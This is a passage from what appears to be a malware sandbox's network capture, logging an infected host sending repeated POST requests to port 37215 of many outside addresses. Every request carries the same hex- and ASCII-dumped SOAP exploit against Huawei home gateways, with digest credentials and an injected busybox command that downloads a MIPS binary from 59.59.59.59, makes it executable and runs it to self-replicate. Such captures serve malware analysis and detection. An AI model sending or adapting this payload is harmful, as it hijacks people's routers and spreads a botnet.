2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1533192.168.2.155600841.204.81.24037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.899969101 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1534192.168.2.1559368197.161.76.9437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.900064945 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1535192.168.2.155455241.9.241.20137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.900090933 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:08.137350082 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:08.569328070 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:09.433367014 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:11.129302979 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1536192.168.2.1554510110.128.26.5937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.904800892 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1537192.168.2.1554424197.118.96.15437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.904824972 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1538192.168.2.155694841.98.230.9737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.905117989 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1539192.168.2.1533238157.208.195.13237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.905167103 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
